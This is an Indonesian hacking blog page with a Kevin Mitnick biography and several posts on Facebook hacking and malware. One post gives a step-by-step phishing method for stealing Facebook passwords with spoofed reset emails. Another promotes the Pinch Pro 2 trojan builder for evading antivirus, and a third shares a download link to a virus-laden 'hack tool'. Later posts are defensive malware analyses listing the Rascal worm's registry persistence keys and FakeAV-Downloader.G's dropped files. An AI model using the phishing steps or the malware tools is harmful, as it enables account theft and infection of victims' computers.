ShoutMix chat widget
Bhokalor
Tampilkan postingan dengan label Cheat and Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Cheat and Hacking. Tampilkan semua postingan

10 Mar 2011

Kevin Mitnick, Sang Legenda Hacker

Sebuah ketukandari pintu apartemennya,Kevin Mitnick membuka pintu dan mendapat lusinan agen FBI dan penegak hukum lain sudah bersiap untuk menangkapnya. Ini adalah akhir perjalanan seorang hacker yang terpaksa buron demi menghindari hukuman penjara. Hacker yang selama masa buronannya itu telah mendapatkan status legendaris, bahkan telah tumbuh menjadi sebuah mitos yang lebih besar dari dirinya sendiriPenangkapan yang terjadi pada 1995 itu menandai awal dari kasus penahanan yang paling kontroversial terhadap seorang pelaku kejahatan cyber. Mitnick adalah seorang penyusup pada sistem komputer menjelma sebagai America's Most Wanted Hacker.
Kecanduan Komputer
Mitnick mudah mempelajari komputer dengan nongkrong di toko radioshack atau diperpustakaan umum, keluarganya tidak cukup berduit untuk memiliki komputer sendiri. Kesukaannya pada komputer berkembang hingga ia dewasa.
Pada periode 1990-an, Mitnick mudah sekali keluar masuk sistem komputer. Namun pada akhir 1980-an ia sebenarnya ingin meninggalkan hobynya tersebut dan mulai mencari pekerjaan yang sah. Sayangnya, sebelum ia bisa melakukan itu, pada 1987 ia tertangkap karena menyusup perusahaan Santa Cruz Organization, sebuah perusahaan piranti lunak yang terutama bergerak dibidang sistem operasi Unix. Ketika itu pengacara mitnik berhasil menurunkan tuduhan kejahatan menjadi tindakan yang kurang baik, Mitnick pun hanya di ganjar 3 tahun masa percobaan.
Tidak sampai setahun Mitnick kembali tersandung kasus hukum. Gara-garanya seorang teman yang komputernya ia gunakan untuk membobol komputer lain melaporkan Mitnick yang berwajib kali itu yang dibobol Mitnick adalah milik Digital Equipment Corporation. Setiap kali membobol komputer yang dilakukan mitnik adalah mengambil code penyusun dari piranti lunak. Kode itu kemudian dia pelajari dengan sungguh-sungguh, terkadang menemukan beberapa kelemahan didalamnya. Dalam sebuah kesempatan Mitnick hanya mengaku mengambil kode penyusun dari piranti lunak yang ia sukai atau yang menarik baginya.
Dalam kasus DEC Mitnick mendapatkan masa tahanan yang lebih berat. Ketika itu pengacaranya menyebut Mitnick memiliki, 'kecanduan pada komputer yang tidak bisa dihentikan'. Ia diganjar 1 tahun penjara.
Di penjara Mitnick mendapatkan pengalaman yang buruk. Pada saat itu legenda Kevin Mitnick atau yang lebih dikenal juga dengan nama samaran 'the condor', sudah semakin membesar. Reputasinya sebagai seorang
penjahat komputer juga semakin membumbung melebihi kenyataan. Sipir di Lompoc, penjara tempat Mitnick berada, mengira Mitnick bisa menyusup kedalam komputer hanya dengan berbekal suara dan telepon. Walhasil
Mitnick bukan hanya tidak boleh menggunakan telepon, ia juga menghabiskan waktu berbulan bulan dalam ruang isolasi. Tak heran jika kemudian ia dikabarkan mengalami sedikit gangguan jiwa saat menjalani hukuman di Lompoc.
Tahun 1989 Mitnick dilepaskan dari penjara. Ia berusaha mencari pekerjaan yang resmi, namun statusnya sebagai mantan narapidana membuat Mitnick sulit mempertahankan pekerjaan. Akhirnya ia bekerja sebagai
pendulang informasi untuk kantor penyelidik kantor swasta. Tentunya ini menyeret Mitnick kembali kepada dalam dunia yang abu-abu dan hitam. Pada awal 1990-an, Mitnickpun dicari lagi oleh FBI. Kali ini takut akan masuk ruang isolasi selama bertahun-tahun, Mitnick memutuskan untuk kabur.
Hacking The Human Side
Keahlian Mitnick sebagai hacker tidak terbatas pada kemapuan teknis belaka. Ia merupakan pada kemampuan teknis belaka. Ia merupakan seorang yang memahami betul bahwa keamanan sistem komputer terdiri dari aspek kebijakan organisasi, sumber daya manusia, proses yang terlibat serta teknologi yang digunakan. Seandainya ia seoarang pahlawan super kemapuannya utama Mitnick adalah seoarang yang mempraktekan ilmu social engginering alias rekayasa sosial. Ini adalah sebuah teknik mendapatkan informasi penting, semisal password, dengan memanfaatkan kelemahan manusiawi.
Kemampuan Mitnick paling baik diilustrasikan dalam cerita berikut, cerita yang dikisahkan Mitnick sendiri pada sebuah forum online Slasdot.org
"Pada satu kesempatan, saya ditantang oleh seorang teman untuk mendapatkan nomor (telepon) Sprint Foncard-nya. Ia mengatakan akan membelikan makan malam jika saya bisa mendapatkan nomor itu. Saya tidak akan menolak makan enak, jadi saya berusahan dengan menghubungi Customer Service dan perpura-pura sebagai seorang dari bagian teknologi informasi. Saya tanyakan pada petugas yang menjawab apakah ia mengalami kesulitan pada sitem yang digunakan. Ia bilang tidak, saya tanyakan sistem yang digunakan untuk mengakses data pelanggan, saya berpura-pura ingin memverifikasi. Ia menyebutkan nama sistemnya."
"Setelah itu saya kembali menelepon Costumer Service dan dihubungkan dengan petugas yang berbeda. Saya bilang bahwa komputer saya rusak dan saya ingin melihat data seorang pelanggan. Ia mengatakan data itu sudah berjibun pertanyaan. Siapa nama anda? Anda kerja buat siapa? Alamat anda dimana? Yah, seperti itulah. Karena saya kurang riset, saya mengarang nama dan tempat saja. Gagal. Ia bilang akan melaporkan telepon telepon ini pada keamanan."
"Karena saya mencatat namanya, saya membawa sorang teman dan memberitahukannya tentang situasi yang terjadi. Saya meminta teman itu untuk menyamar sebagai 'penyelidik keamaman' untuk mencatat laporan dari petugas Customer Service dan berbicara dengan petugas tadi. Sebagai 'penyelidik' ia mengatakan menerima laporan adanya orang berusaha mendapatkan informasi pribadinya pelanggan. Setelah tanya jawab soal telepon tadi, 'penyelidik menyakan apa informasi yang diminta penelepon tadi. Petugas itu bilang nomor Foncard. 'penyelidik' bertanya, memang berapa nomornya? Dan petugas itu memberikan nomornya. Oops. Kasus selesai"
Buron
Sebaga i buronan Mitnick berusahan sebisa mungkin untuk tidak tertangkap. Ia sering berpindah-pindah tempat tinggal dan selalu menanggalkan berbagai kebiasaan. Berbagai cara ia lakukan agar tidak terlacak oleh pengejarnya. Namun ia tidak bisa meninggalkan hobinya mengoprek komputer dan jaringan Internetnya. Bahkan beberapa keahliannya konon digunakan untuk mendapatkan identitas baru.
Legenda Mitnick selama buron dalam kurang lebih dua tahun, semakin menjadi-jadi ia menjelama sebagai 'Ninja Cyber' yang konon bisa membobol komputer Pentagon hanya dengan remote televisi, sebuah rumor yang melebihi cerita fiksi apapun.
Mengapa Mitnick, seorang buron dalam kasus pembobolan komputer, bisa menjadi penjahat yang paling dicari? Ini tak lepas dari peran media massa. Secara khusus adalah serangkaian artikel sensasional dari John Markoff yang dimuat di New York Times.
Markoff mengutuk Mitnick bagaikan seorang teroris. Dalam sebuah pernyataan setelah lama dibebaskan, Mitnick menyebut citra dirinya yang ditampilkan Markoff bagaikan seoarang teroris yang berusaha mengendalikan nuklir dunia. "saya seakan-akan seorang Osama bin Mitnic," ujarnya bercanda.
Markoff menggambarkan Mitnick sebagai seorang yang mematikan, tak bisa dihentikan dan layak menjadi buronan sepuluh besar FBI maupun penegak hukum lainnya. Artikel Mafkoff, yang kadang muncul di halaman depan, menjadikan Mitnick kandidat terkuat proyek percontohan atas kejahatan cyber. Maka masa depan Mitnick dalam penjara boleh dibilang sudah dituliskan saati itu juga.
Selama menjadi buron Mitnick juga terus menjalankan aksinya. Ia membobol berbagai komputer perusahaan besar. Termasuk Sun Microsystem. Ia menggunakan, dan maksutnya disini adalah membobol rekening seorang pada layanan penyimpanan online untuk menyimpan backup dari hasil aksinya. Sebenarnya Mitnick tidak bekerja sendirian namun saat tertangkap ia tak pernah mengungkapkan siapa saja rekannya.
Salah satu korban Mitnick adalah T. Shimomura, seorang ahli komputer yang dalam beberapa tulisan di Internet diragukan kebersihannya. Ada dugaan bahwa Shimomura juga seorang hacker yang kerap melakukan perbuatan ilegal. Satu hal yang banyak disetujui adalah Shimomura memiliki sikap yang arogan dan nampaknya ingin muncul sebagai pahlawan dalam kisah perburuan Mintick.
Shimomura, Markoff dan FBI bahu membahu untuk menangkap sang buronan. Panduan dari berita sensasionalnya Mafkoff, kemampuannya hacking Shimomura dan kekuatan hukum FBI pada akhirnya melacak kediaman Mitnick.
Seperti biasanya kisah tertangkapnya seoarang buron, Mitnick melakukan ketledoran. Layanan penyimpanan yang ia gunakan rupanya memiliki program otomatis untuk mencek isi file yang disimpan. Pemilik rekening yang digunakan Mitnick mendapatkan peringatan dari sistem mengenai kapasitas berlebih. Ini adalah awal tertangkapnya Mitnick.
Mitnick mengakui bahwa dirinya ceroboh karena tidak menduga bahwa FBI, Shimomura, Markoff, dan penyedia layanan telepon selular melakukan kerja sama yang begitu erat dan terpadu.
"Operator seluler melakukan pencarian dalam database penagihan mereka terhadap dial-up ke layanan Internet Netcom POP. Ini, seperti bisa diduga, membuat mereka bisa mengidentifikasi area panggilan dan nomor MIN (mobile identification number) yang saya gunakan saat itu. Karena saya kerap berganti nomor, mereka mengawasi panggilan data apapun yang terjadi di lokasi tersebut. Lalu, dengan alat Cellscope 2000 Shimomura, melacak sinyal telepon saya hingga ke lokasi yang tepat,"Mitnick menuturkan.
Dua minggu sebelum tertangkapnya Mitnick baru pindah ke Raleigh. Lokasi baru membuat kurang waspada dan ia lupa melacak jalur dial-up yang digunakannnya. Beberapa jam sebelum tertangkapnya Mitnick baru ada sesuatu yang terjadi, pelacakan dan pengawasan sedang dilakukan terhadap jalur yang ia gunakan. Saat ia sedang berusaha melacak sejauh mana pengawasan telah dilakukan hingga siapa dilbalik pelacakan tersebut, ia mendengar ketukan pintu. Mitnick membuka pintu dan berhadapan dengan lusinan U.S Marshall dan FBI.
Empat Setengah Tahun Digantung
Setelah tertangkap Mitnick ditahan tanpa kemungkinan jaminan. Ia juga tak diajukan untuk pengadilan. Kurang lebih empat tahun ia habiskan tanpa kepastian. Hal ini benar-benar membuat Mitnick frustasi.
Selama dalam penjara FBI ia tak mendapatkan kesempatan dalam kasusnya. Bahkan Mitnick dan pengacaranya tak bisa melihat data kasus tersebut karena terdapat di laptop dan akses laptop bagi Mitnick dianggap membahayakan. Mitnick dituding bisa membuat misil meluncur hanya berbekal laptop atau telepon. Larangn itu tetap berlaku meskipun pengacaranya menggunakan laptop tanpa modem dan kemampuan jaringan apapun.
Mitnick pada akhirnya dituding menyebabkan kerugian hingga ratusan juta dollar kerugian yang menurut Mitnick tidak benar, karena perusahaan yang konon dirugikan bahkan tidak melaporkan kerugian tersebut dalam laporan tahunan mereka.
Kesepakatan akhir bagi Mitnick adalah pengakuan bersalah. Bersalah dalam kasus pembobolan komputer dan penyadapan jalur telepon. Mitnick menyerah dan mengikuti itu, dengan imbalan 4 tahun tahun lebih waktunya dalam penjara diperhitungkan sebagai mas tahanan. Total Mitnick dihukum adalah 5 tahun dipenjara , 4 tahun dalam tahanan yang terkatung-katung dan 1 tahun lagi sisanya.
Ia dibebaskan pada tahun 2000 dengan syarat tak boleh menyentuh komputer atau telepon. Pada tahun 2002 baru ia boleh menggunakan komputer tapi tidak yang tersambung ke Internet. Baru tahun 2003 ia menggunakan Internet lagi untuk pertama kalinya.
Sejak dibebaskan Mitnic berusaha untuk memperbaiki hidupnya. Ia menuliskan dua buku mengenai hacking, selain itu ia juga mendirikan perusahaan konsultan keamanan sendiri. "Hacker adalah satu-satunya kejahatan yang keahliannya bisa digunakan lagi untuk sesuatu yang etis. Saya tidak pernah melihat itu dibidang lain, misal perampokan etis," tutur Mitnick.

19 Feb 2011

HACKING FACEBOOK DENGAN FORGOT PASSWORD

Banyak cara untuk mencuri username/email dan password untuk login account facebook. Diantaranya dengan cara berikut ;

1.
Buat email palsu dengan domain yang meyakinkan dan bukan gratisan seperti yahoomail dan googlemail. (Contoh nyata ; ****@backd00red.org)
2.
Cari email target, kita dapat mencari daftar email melaui banyak cara, dan yang paling amatir adalah lewat google atau untuk percobaan, pakai saja email teman kamu.
3.
Setelah mendapatkan email yang terdaftar di facebook, buka halaman login facebook.
4.
Pilih link forget password, reset password, atau change email address, atau yang sejenis.
5.
Kirimkan pada email target. Usahakan email tersebut mirip dan disertai dengan signature / tertanda team facebook. Contohnya :


Screenshot email di atas adalah contoh nyata yang pernah berhasil menipu seseorang pemilik alamat blog wilson-the prayer. Silahkan baca pengalaman pak wilson dengan facebook nya tersebut.
6.
Lanjut, Email di atas menawarkan konfirmasi asosiasi (hubungan) account dengan email yang kita miliki. Jika target menerima dan mengikuti link yang kita berikan di atas. Maka password lama atau baru akan dikirim ke email kita, bukan lagi pada email si pemilik asli alias target.
7.
Done. Kita mendapatkan passwordnya.

Selamat Mencoba

14 Feb 2011

Virus

Membuat virus, hal yg menyenangkan sekaligus menjengkelkan. Kadang virus yg kita buat tidak bisa bekerja dengan baik. Sekarang ini bermacam-macam cara untuk membuat virus. Cara yg paling mudah adalah menggunakan software ini. Namanya PInch pro 2 Builder. Merupakan software/ tool dirancang secara profesional untuk membuat virus. Dengan tool ini kita bisa membuat virus trojan. Tanpa memerlukan modal pengetahuan bahasa pemrograman, bahkan sampai orang awam pun bisa membuatnya. Hanya dengan setingan beberapa option langsung compile…Jadi deh virus tersbut. Mudahnya lagi tipe-tipe torjan tersebut bisa kita setting da kita ubah-ubah jenisnya. Hal ini bisa dilakukan untuk menghindar dari tangkapan anti-virus. wuih…ngeri banget ya!
download disini
Apakah anda suka membuat virus?
bentuk virus
Seperti itulah tampilannya.

fb hack


Download Software Hack Facebook | Free Download Software Untuk Hack Facebook

Software ini gue dapatkan dari salah seorang pembaca blog ini ( kebetulan dia membaca tentang hack facebook). Setelah gue coba -sebagian- ada hal penting yang harus kalian ketahui dari software ini, yaitu :

Berhasil apa gak, blom saya coba sampai selesai. Gimana mau nyoba ?
Cuma gue extract aja dah keluar warning dari AVIRA “virus attact”.

Dan lebih bahaya lagi, jangan pernah extract program ini di computer kesayangan kamu (kecuali komputernya pake deepfreeze), karena semua program yang berextensi .exe bakal ludes di telan ni viruss. MAKANYA, klo mau nyoba software ini lebih baik di warnet atau pakai computer yang lain (yang ada deepfreeze).

Karena blom saya coba, jadi belum tahu tentang kebenarannya, maka lebih baik saya share dulu buat temen yang lain. Mungkin ada yang berani mencoba ? silahkan di download dulu,

Download: http://www.hostinglokal.com/4w75o6sk...tware.zip.html

Rascal: Malware Lama Bersemi Kembali

Rascal

Rascal. Mungkin bagi sebagian orang tidak asing lagi mendengar nama worm Rascal. Beberapa forum dan blog pribadi banyak menyebutkan malware ini telah cukup lama menyebar. Beberapa minggu yang lalu pun ada pengguna yang mengirimkan sampel virus Rascal, dan menyebutkan bahwa komputernya terinfeksi malware dengan nama “Miyabi-New Episode(NO SENSOR)” dan “JapanPorn”.
A. File Info
Nama: Rascal
Asal: Bali
Ukuran File: 68.6 KB (70,321 bytes)
Packer: FSG v2.0   F[ast] S[mall] G[ood]  – www.xtreeme.prv.pl
Pemrograman: Visual Basic 6.0
Icon: Windows Media Player File
Tipe: Worm

B. Nama Malware

Namanya diambil dari Internal Name pada Properties file yang berisi kata “RASCAL.EXE”. Dengan Icon yang menyerupai file WMP File, worm ini mudah sekali membuat user untuk mengaktifkannya. Terlebih lagi dengan Description File yang berisi DAT File dan Company-nya yang berisi seolah-olah ukuran file sebesar 11,289 KB padahal file aslinya berukuran 68.6 KB.
Icon Rascal
C. Companion/File yang dibuat

  • Rascal membuat pesan yang terdapat di folder C:\Documments and Settings\[nama user]\My Document\JapanPorn.DAT. Sebenarnya file tersebut adalah file teks yang di dalamnya terdapat pesan:
Pesan DAT Rascal
  • Membackup aplikasi system Windows seperti msconfig.exe, regedit.exe, cmd.exe, Command.com, dxdiag.exe, sysedit.exe, taskmgr.exe ke folder “C:\pUkcaB_LACSAR\” yang kemudian di ubah ekstensinya menjadi “.RASCAL”. contohnya, cmd.RASCAL, Command.RASCAL, dxdiag.RASCAL, msconfig.RASCAL, regedit.RASCAL, sysedit.RASCAL, taskmgr.RASCAL.
  • Membuat beberapa file di flash disk dengan nama seperti , Ayam-kampus.exe, Miyabi-New Episode(NO SENSOR).exe, Miyabi-New Episode(NO SENSOR).DAT, dan Autorun.inf.
AutoRun Rascal
  • Mengcopy beberapa file yang nantinya akan dijadikan host untuk di aktifkan setelah proses startup.
1
2
3
4
5
6
7
C:\Miyabi-New Episode(NO SENSOR).EXE
C:\Miyabi-New Episode(NO SENSOR).DAT
C:\WINDOWS\msvbvm60.EXE
C:\WINDOWS\system32\rascal32.EXE
C:\Documents and Settings\[nama user]\Templates\userinit.EXE
C:\Documents and Settings\[nama user]\My Document\JapanPorn.EXE
C:\Documents and Settings\[nama user]\My Document\Miyabi-New Episode(NO SENSOR).EXE
  • Menambahkan Oeminfo agar bisa merubah isi Properties My Computer.
1
2
C:\WINDOWS\system32\oeminfo.ini
C:\WINDOWS\system32\oeminfo.bmp
System Properties Rascal
D. Hasil Infeksi

  • Melakukan overwrite pada file msconfig.exe, regedit.exe, cmd.exe, Command.com, dxdiag.exe, sysedit.exe dan taskmgr.exe yang kemudian dirubah menjadi aplikasi Notepad.exe.
Notepad
  • Mendisable fungsi windows seperti, Registry Editor, Disable Show Hidden File and Show Extension, Task Manager.
  • Membuat startup pada registry.
1
2
3
4
5
6
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Systemshell = explorer.exe C:\WINDOWS\system32\rascal32.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SystemSystem = C:\WINDOWS\msvbvm60.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SystemUserinit = userinit.exe,C:\Documents and Settings\Administrator\Templates\userinit.exe,
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Windows = C:\WINDOWS\msvbvm60.exe /register
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\load = C:\WINDOWS\system32\rascal32.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NET-SERVICES = C:\WINDOWS\system32\rascal32.exe /register
  • Menampilkan pesan jika user menekan Enter pada keyboard dan menampilkan juga pesan Windows File Protection Change agar user menjalankan Proses instalasi windows.
Pesan Enter
  • Secara otomatis menutup semua proses yang sedang berjalan dan memiliki nama Caption seperti di bawah ini.
    1)registry
    2)tuneup
    3)anti
    4)avg
    5)ansav
    6)advanced
    7)virus
    8)killer
    9)processes
    10)process
    11)utility
    12)tool
    13)hacker
    14)cracker
    15)scanner
    16)vir
    17)hijack
    18)hex
    19)editor
    20)snif
    21)run
    22)free
    23)japan
    24)porn
    25)adult
    26)sex
    27)hot
    28)gadis
    29)bugil
    30)asia
    31)kamasutra
    32)blue
    33)samples
    34)mahasiswa
    35)mahasiswi
    36)lokal
    37)local
    38)siswi
    39)siswa
    40)telanjang
    41)smu
    42)sma
  • Ada beberapa key di regstry yang tidak berjalan dengan benar seperti:
1
2
3
4
5
6
7
8
9
10
HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer
NoClose
NoLogOff
NoFind
NoControlPanel
NoViewContextMenu
NoFolderOptions
     
HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Winlogon
SFCScan

E. Pembersihan

Untuk membersihkan worm Rascal ini, serta mengembalikan seluruh registry dan file system yang di backup seperti yang sudah di jelaskan di atas, dapat menggunakan PCMAV 4.5 Update Build 2.
PCMAV Detection
PCMAV Cleaning

PCMAV 4.5 Update Build2

Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 4.5 Update Build1 telah hadir dengan penambahan 96 pengenal varian virus baru. Bagi Anda pengguna PCMAV 4.5, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:
SendSpace.com
ZippyShare.com (mirror)
Rapidshare.com (mirror)
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.
Daftar tambahan virus hingga PCMAV 4.5 Update Build2:
Autoit-ReplaceIcon.B
Autoit-ReplaceIcon.C
Autoit.FB
Autoit.FC
Autoit.FC.ini
Baidu
Baidu.dll
Baidu.dns
Baidu.host
Baidu.inf
Beds
Bekol
BudiLuhur.C
BudiLuhur.C.inf
DelPS
DelPS.ini
Ebetazijl.A
Ebetazijl.A.inf
Ebetazijl.B
Ebetazijl.B.lnk
FakeAV-Downloader.C
FakeAV-Downloader.C.lnk
FakeAV-Downloader.D
FakeAV-Downloader.D.dll
FakeAV-Downloader.E
FakeAV-Downloader.F
FakeAV-Downloader.F.exe
FakeAV-Downloader.F.job
FakeAV-Downloader.F.lnk.A
FakeAV-Downloader.F.lnk.B
FakeAV-Downloader.F.ref
FakeAV-Downloader.F.setup
FakeAV-Downloader.F.url
HB10
Malingsi.AA
Malingsi.Y
Malingsi.Z
Malingsi.Z.dll
Malingsi.Z.exe
Malingsi.Z.ini
Malingsi.Z.mrc
Mshearts.vbs.C
MsKunti.vbs
MsKunti.vbs.html
MsKunti.vbs.inf
MsKunti.vbs.ini
MsKunti.vbs.txt
Nami-Ternate
Nami-Ternate.bat.A
Nami-Ternate.bat.B
Nami-Ternate.bat.C
Nami-Ternate.bat.D
Nami-Ternate.inf.A
Nami-Ternate.inf.B
Nami-Ternate.ini.A
Nami-Ternate.ini.B
Nami-Ternate.ini.C
Nami-Ternate.txt.A
Nami-Ternate.txt.B
Poet-Kompti
Poet-Kompti.txt
Rascal
Rascal.bmp
Rascal.dat
Rascal.inf
Rascal.ini
Recycler.BK
Recycler.BK.inf
Recycler.BL
Recycler.BL.inf
Recycler.BM
Recycler.BM.inf
Recycler.BN
Recycler.BN.inf
RedWines.B
Restore.A
Restore.A.inf
Restore.B
Restore.B.inf
Restore.C
Restore.C.inf
Samok.vbs
Samok.vbs.bat
Samok.vbs.inf
Serviks.C
Serviks.C.html
Serviks.C.inf
Serviks.C.vbs
Sherry
VB-Shortcut-WLogon.A
VB-Shortcut-WLogon.B
VB-Shortcut-WLogon.C
VB-Shortcut-WLogon.D
VB-Shortcut-WLogon.E
VB-Shortcut-WLogon.F
VB-Shortcut-WLogon.G

FakeAV-Downloader.G: Serangan Antivirus Palsu

FakeAV-Downloader.G

FakeAV-Downloader.G. Mungkin Anda sering mendownload freeware/shareware kemudian di-install di komputer Anda, tetapi bagaimana jika software tersebut membutuhkan serial/kode registrasi sampai-sampai tidak bisa di hapus / Uninstall,  software seperti itu sudah tentu sangat mengganggu pengguna.
Belakangan ini kami beberapa kali mendapat email dari pembaca yang mengirimkan contoh malware yang berbeda dari biasanya. Sebab sebagian besar sample yang kami terima adalah berupa worm atau virus, sedangkan kali ini berupa sebuah “antivirus”.
A. File Info
FakeAV-Downloader.G Overview
Nama: FakeAV-Downloader.G
Asal: Unknown
Ukuran File: 1.60 MB (1,678,848 bytes)
Packer: Unknown
Pemrograman: C++
Icon: Menyerupai aplikasi security
Tipe: Trojan

B. Nama Malware

Sebelumnya kami sudah mendapat beberapa variant FakeAV-Downloader. Kemampuan malware tipe trojan ini adalah menggunakan tipuan untuk mendownload file “update database ” yang menjadi ciri khas antivirus pada umumya. Dengan membawa nama antivirus ternama, membuat user yang mungkin sedang kebingungan karena adanya malware di komputernya, justru akan mendapatkan dua kali serangan malware setelah menjalankan antivirus palsu ini.
C. Companion/File yang dibuat

Setelah aktif di memory, worm ini membuat banyak file dengan ekstensi (.dll / .exe) dan menggunakan nama yang acak ke 3 sub folder seperti:
C:\WINDOWS
aBrIFiyQY.dll, afkwBOhfD.exe, afquDuSe.dll, AGwUU.dll, AjuFji.exe, akVsP.exe, AnPaaALRR.exe, aQqQvPN.dll, AtfsLI.dll, awcem.exe, bgKeWbwU.exe, BgLnlO.dll, BsDWukH.exe, BSnefB.exe, bWhJW.dll, BXYvBEp.dll, ccnCqsRo.exe, cdqfmoM.dll, cfaTbp.exe, CKXEmbjib.exe, CmBbh.exe, CNiHDxDwk.dll, cQYKCVFkV.dll, CSuMVRH.exe, dEEEXcLT.exe, dGMQP.dll, DImtrGPAh.dll, DIUjfK.exe, DkmRlQmD.exe, dNCAI.dll, DTiOxoTum.dll, dYFRUqLgF.exe, eBNkLHSmN.exe, ecuPs.exe, ECWBNfk.dll, edXRCm.dll, EFBVQAdib.dll, efrqPeo.exe, egMHvnNwT.dll, egyrSYL.dll, EmUHiPR.dll, eyodBod.exe, fbIJXj.dll, FBtDOQfjT.dll, frjdMgiV.dll, FTqiwuCNU.dll, fuiLaC.exe, fvFtSVaY.exe, GJpbfeo.exe, gktQf.exe, GliCKeGC.dll, gPddt.exe, gPpdhsOVd.dll, gWlIcuti.exe, GXaoKW.exe, HaGREENVw.dll, HdbwsAr.exe, HEcKGq.exe, hILgt.dll, HLAsaxb.exe, hpDsUt.dll, HqhyOwV.exe, HuJsHFNsA.exe, huvkc.exe, HwGRRrn.exe, HwUqxV.exe, iArtpwytN.exe, IGIiISQko.dll, iHgOF.dll, iJJqW.dll, IKkmH.exe, InfDwuwe.dll, IoQDHPOj.exe, IsWnrCrly.dll, ItgqUQbo.dll, itjVCtL.exe, JcPwG.exe, JHJUN.exe, jlonQ.dll, jMAksN.exe, jMFqDG.exe, JPLNfAK.exe, jQxkkPf.dll, JRAxfO.dll, JTlWNL.dll, jugPP.dll, jXYtXUj.exe, KAgtbOFFN.dll, KBloSFpn.dll, KhrXlOS.dll, KMqGkNT.dll, KNQiXI.dll, kpSfYcxn.exe, ksQLWnPx.dll, KWaIhRmA.dll, KxsSqtGA.exe, KYVMvVf.dll, LBuivMO.exe, LJmVHyOy.exe, LmUieVCvD.exe, LOXNbcBF.exe, LWQrT.exe, mauLRra.exe, mCwVvgOyW.dll, meMVntQFr.exe, MfDXDaJQp.dll, MGpLf.exe, mJbPnAuWP.exe, mNxJATC.dll, mraVnDWM.dll, mSgaBF.exe, namoxNBgw.exe, NJCjVdag.exe, NKdcmk.exe, NMseyXJMQ.exe, NodmP.exe, NOPbhF.exe, NUOcVEo.dll, nXQxMRcyS.dll, ODDMIA.dll, OhkaPAiI.dll, oKiWewDae.dll, oMmDa.exe, omWuQ.dll, ooyJFpTc.exe, OTUCA.exe, pAdUilHN.dll, pjOUr.exe, pktdIUu.dll, pktFHi.dll, pLXOdVy.dll, PPuypaOJ.dll, PQtyRvk.exe, PTyReeJU.exe, PViqt.dll, Qjrwm.dll, qtDolISh.dll, raDqPUexB.dll, rerByB.exe, RHDSlOv.exe, RlFKIkH.exe, RliLfdFHL.dll, RtrcuR.exe, rVXusVD.dll, SgkDXf.dll, SJfrRY.dll, skCxwOmy.exe, SlrKjdOq.dll, SmfBiLAf.dll, sNPwFfPOj.exe, SNqTC.exe, SQgjVglrM.exe, StUDfXter.exe, sUASnms.dll, SwQovYS.dll, system32, SYvri.exe, TaoYkr.dll, TCNpuAy.dll, tGfkbAB.dll, TiXpucJ.dll, ToXmTp.exe, TrUHIN.exe, tSRiJyj.dll, TsTAsj.exe, TTdMFkTsD.exe, tTsuAJKo.exe, TUHCB.dll, UcUYAFVwd.exe, UEbknsR.dll, UGUSTr.dll, UjkKUNO.exe, UkcHyW.exe, ulVvcuChS.dll, uOoliMG.exe, uphGP.exe, uSnsSBC.exe, UtaiFoBhj.dll, uWYbeol.dll, UYEat.dll, VBOvTFIqF.exe, vnEansH.exe, VnITeRBdk.exe, VNXRbF.exe, VqvHhXn.exe, vuvceLU.exe, VXIATUn.exe, wAcFLkD.dll, wbNJOmAmf.dll, WCREYPiw.dll, WftBouxoB.dll, whJUeN.exe, wIOYUHnEN.exe, WKVfq.exe, WloJS.exe, wTBHxhXT.dll, WtuvvJ.exe, wXcsGlYUR.exe, xbhVDpG.exe, xDpClu.dll, XDqFU.dll, xiEbUMtT.dll, xjNJOCA.dll, xkDStBF.exe, XLBHexa.exe, xPdVmRsO.exe, xQxQW.dll, xrJwUGpHX.exe, ycEYX.dll, ycPxP.dll, yDgYSBuXd.exe, yEGERbv.dll, yFWmoaLVX.exe, yIohLsGwt.exe, ylkLe.dll, YNCEPCXH.dll, Ypvhabw.exe, YurrpofWI.exe, YVGdkkA.dll, YwgoKMGF.dll
C:\WINDOWS\system32
